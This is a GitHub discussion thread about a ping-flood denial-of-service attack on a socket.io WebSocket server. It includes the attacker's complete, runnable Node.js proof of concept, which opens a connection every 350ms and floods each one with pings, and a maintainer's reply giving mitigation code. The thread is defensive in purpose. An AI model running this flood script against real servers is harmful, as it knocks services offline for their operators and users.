DOS Attack on our WS server, potential vulnerability? #5235

FabianB12 · 2024-11-21T17:59:15Z

FabianB12
Nov 21, 2024

Hey, my & a few other websites has been hit by the following attack over the last few days. We've managed to retrieve the PoC from the person doing the attack & it's basically a ping flooding attack.

What's happening?

The attacker is using a pretty simple but effective method:

Spins up 5 workers
Each worker spams new WebSocket connections every 350ms
Once connected, floods each connection with pings (like, a lot of pings 😅)
Keeps connections alive with heartbeats

After a little bit, the WS server just dies. The obvious solution seems to be rate limiting pings per IP address, but that wasn't as straight forward as I had hoped (because the events for pings are not emitted in the same way as other pings).

Is this considered a socket.io vulnerability? Or is this considered a regular DOS attack?
What's the "correct" way to mitigate this?

The PoC we retrieved from the attacker:

const { Worker, isMainThread, parentPort } = require("worker_threads");

const WebSocket = require("ws");

if (isMainThread) {
  for (let i = 0; i < 5; i++) {
    const worker = new Worker(__filename);
    worker.on("message", (message) =>
      console.log("Worker message:", message)
    );
    worker.on("error", (error) => console.error("Worker error:", error));
    worker.on("exit", (exitCode) =>
      console.log(`Worker stopped with exit code ${exitCode}`)
    );
  }
} else {
  console.log(`[Worker ${process.pid}] Worker started`);

  function conn() {
    const connId = Date.now();
    console.log(`[Worker ${process.pid}] Creating connection #${connId}`);
    
    const ws = new WebSocket(
      "wss://api.example.com:8443/socket.io/?EIO=4&transport=websocket",
      {
        headers: {
          "accept-encoding": "gzip, deflate, br, zstd",
          "accept-language": "en-US,en;q=0.9",
          "cache-control": "no-cache",
          connection: "Upgrade",
          host: "api.example.com",
          origin: "https://example.com",
          pragma: "no-cache",
          "sec-websocket-extensions":
                        "permessage-deflate; client_max_window_bits",
          "sec-websocket-key": "XWCz1+3Xh0Gd8c8f3biBoHSNUZg=",
          "sec-websocket-version": "13",
          upgrade: "websocket",
          "user-agent":
                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0",
        },
      }
    );

    ws.on("open", () => {
      console.log(`[Worker ${process.pid}] Connection #${connId} established`);
      
      setInterval(() => {
        ws.send("3");
      }, 2000);
      
      for (let i = 0; i < 9; i++) {
        setInterval(() => {
          ws.ping();
          ws.ping();
          ws.ping();
          ws.ping();
          ws.ping();
          ws.ping();
          ws.ping();
          ws.ping();
          ws.ping();
        });
      }
    });

    ws.on("message", (data) => {
      console.log("Received:", data.toString());
      parentPort.postMessage(data.toString());
    });

    ws.on("close", () => {
      console.log(`[Worker ${process.pid}] Connection #${connId} closed`);
    });

    ws.on("error", (err) => {
      console.error(`[Worker ${process.pid}] Error on connection #${connId}:`, err.message);
    });
  }

  setInterval(conn, 350);
}```

Answered by darrachequesne

Nov 22, 2024

Hi! Yes, I'd say that counts as a regular DOS attack.

You could catch the 'ping' messages in your application and close the connection:

function listenToPing(socket) {
  socket.on("ping", () => {
    console.warn("unexpected ping");
    socket.close();
  });
}

io.engine.on("connection", (engineSocket) => {
  if (engineSocket.transport.name === "websocket") {
    listenToPing(engineSocket.transport.socket);
  } else {
    engineSocket.on("upgrade", (transport) => {
      if (transport.name === "websocket") {
        listenToPing(transport.socket);
      }
    })
  }
});

I'm wondering whether we should include it in the library, as receiving ping / pong events is not really expected. Thoug…

View full answer

darrachequesne · 2024-11-22T10:14:42Z

darrachequesne
Nov 22, 2024
Maintainer

Hi! Yes, I'd say that counts as a regular DOS attack.

You could catch the 'ping' messages in your application and close the connection:

function listenToPing(socket) {
  socket.on("ping", () => {
    console.warn("unexpected ping");
    socket.close();
  });
}

io.engine.on("connection", (engineSocket) => {
  if (engineSocket.transport.name === "websocket") {
    listenToPing(engineSocket.transport.socket);
  } else {
    engineSocket.on("upgrade", (transport) => {
      if (transport.name === "websocket") {
        listenToPing(transport.socket);
      }
    })
  }
});

I'm wondering whether we should include it in the library, as receiving ping / pong events is not really expected. Thoughts?

1 reply

FabianB12 Nov 22, 2024
Author

Thanks! Yeah, I think it'd be a good addition, because the way of dealing with this right now is not super obvious.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

DOS Attack on our WS server, potential vulnerability? #5235

{{title}}

Replies: 1 comment 1 reply

{{title}}

{{title}}

Select a reply

DOS Attack on our WS server, potential vulnerability? #5235

FabianB12 Nov 21, 2024

What's happening?

Replies: 1 comment · 1 reply

darrachequesne Nov 22, 2024 Maintainer

FabianB12 Nov 22, 2024 Author

FabianB12
Nov 21, 2024

Replies: 1 comment 1 reply

darrachequesne
Nov 22, 2024
Maintainer

FabianB12 Nov 22, 2024
Author